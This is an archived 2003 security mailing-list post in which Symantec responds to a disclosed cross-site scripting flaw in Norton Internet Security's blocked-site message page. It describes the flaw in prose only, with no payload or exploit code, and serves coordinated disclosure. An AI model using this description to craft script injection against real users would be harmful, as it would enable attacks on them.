Re: Norton Internet Security Blocked Sites XSS

From: Sym Security (symsecurity_at_SYMANTEC.COM)
Date: 10/28/03

  • Next message: Free, Bob: "Re: Unannounced revisions to MS patches"
    Date:         Tue, 28 Oct 2003 13:25:24 -0600

    On 10/27/2003 01:27 PM, DigitalPranksters posted the following to

    DigitalPranksters Security Advisory

    Norton Internet Security Blocked Sites XSS

    Risk: Low

    Product: Norton Internet Security 2003 v6.0.4.34 (Maybe others we only
    tested this version)

    Product URL:

    Found By: KrazySnake -

    When Norton Internet Security 2003 blocks a web site, it returns a web
    page to the browser stating that the site has been blocked. This error
    message contains the URL which was requested. Norton Internet Security
    2003 appears to do no validation or encoding of the URL before returning
    it in the error message. This allows an attacker to supply a URL that
    contains script. This script will run in the context of the blocked site.

    We have marked this as a low risk because we believe in most situations,
    there will be little information of interest since the site is normally
    blocked (browser cookies from the blocked site probably do not exist,
    etc). However this does allow sites that are blocked to run script on the
    victim's machine when it shouldn't be allowed.

    Symantec Security Advisory
    27 October 2003
    Symantec Network Internet Security (NIS) Blocked Site Return Messages Not
    Properly Validated
    A security group, The Digital Pranksters, reported an issue they
    discovered in Symantec's Norton Internet Security product.
    The URL in the return message from a site on the blocked list in the
    Norton Parental Control feature can allow an unauthorized
    script to run the client system.

    Components Affected
    Symantec's Norton Internet Security 2003
    Symantec's Norton Internet Security 2004

    Symantec's Norton Internet Security blocks inappropriate web content to
    help parents keep their children safe from
    inappropriate material while online. The Norton Parental Control blocks
    access to newsgroups and Web sites that may not be
    suitable for children. When a link is accessed or followed to one of the
    sites on the blocked list, Norton Internet Security
    returns a message stating that the site is restricted and has been
    blocked. The returned message included the URL of the
    restricted site and is presented in a separate browser window Norton
    Internet Security opens on the client system. Digital
    Pranksters reported that they were able to supply a URL from a blocked
    site that contained additional unauthorized script
    embedded in the URL. This script displayed in the blocked access message
    window on the client system.

    Symantec Response
    Symantec has verified this issue. There is a bug in the way Norton
    Internet Security is validating the content it returns in
    the informational page. This is being fixed and will be forthcoming in a
    future LiveUpdate to Norton Internet Security
    The risk presented by this bug is very low to non-existent. Any
    unauthorized script returned in the blocked site URL runs in
    the context of the informational window that Norton Internet Security
    opens on the client system. This is a very restricted
    environment providing no access to the client system outside of the
    display window or any unauthorized information from the
    client system to be sent out. While it presents little risk to the client
    system, it is unwarranted action that is being
    Symantec takes any potential security issues with Symantec products very
    seriously. While the issue described by the Digital
    Pranksters applies only to the subset of Web sites contained in the Norton
    Internet Security Block Site list, there are many
    other malicious Web sites on the Internet and many ways of enticing a
    careless surfer to visit such a site. Symantec recommends
    the following best practices as part of a normal security posture:

    * Keep vendor-supplied security patches and updates for all application
    software and operating systems current.
    * Run current Anti-Virus/Firewall applications and keep the definitions
    updated. Systems should be scanned on a regular basis.
    * Be wary of attachments delivered via email. Especially ones with vbs,
    .bat, .exe, .pif and .scr file extensions that are
    commonly used to spread viruses, worms, and trojans.
    * Even if the sender is known, users should be wary of attachments or
    unknown files if the sender does not thoroughly explain
    the content in the body of the email. The source of the original
    attachment is often unknown.
    * If in doubt, users should contact the sender before opening the
    attachment or downloading the file to see if, in fact, they
    did intend to send it. If there is still doubt, users should delete the
    document in question without opening it.
    * If you intend to download an attachment, download to a separate folder
    and scan prior to opening.
    * Practice safe surfing.

    Symantec takes the security and proper functionality of our products very
    seriously. Symantec appreciates the coordination of
    Digital Pranksters security team in identifying and providing details of
    this area of concern as well as working closely with
    Symantec to properly address the issue. Anyone with information on
    security issues or concerns with Symantec products should

    Copyright (c) 2003 by Symantec Corp.
    Permission to redistribute this alert electronically is granted as long as
    it is not edited in any way unless authorized by
    Symantec Security Response. Reprinting the whole or parts of this alert in
    any medium other than electronically requires
    permission from
    The information in the advisory is believed to be accurate at the time of
    publishing based on currently available information.
    Use of the information constitutes acceptance for use in an AS IS
    condition. There are no warranties with regard to this
    information. Neither the author nor the publisher accepts any liability
    for any direct, indirect, or consequential loss or
    damage arising from use of, or reliance on, this information.
    Symantec, Symantec products, Symantec Security Response, and SymSecurity
    are registered trademarks of Symantec Corp. and/or
    affiliated companies in the United States and other countries. All other
    registered and unregistered trademarks represented in
    this document are the sole property of their respective companies/owners.

    Symantec Security Response
    Hash: SHA1

    Version: PGP 7.0.1

    -----END PGP SIGNATURE-----

    NTBugtraq subscribers save $103.00 off the TICSA exam by using promo
    code "NT1003" when registering to take the TICSA exam at
    Prove to your employer and peers that you have the knowledge and
    abilities to be an active stakeholder in today's enterprise security.
    Become TICSA certified  Promotion expires
    12/31/03 and cannot be used in combination with other offers.

  • Next message: Free, Bob: "Re: Unannounced revisions to MS patches"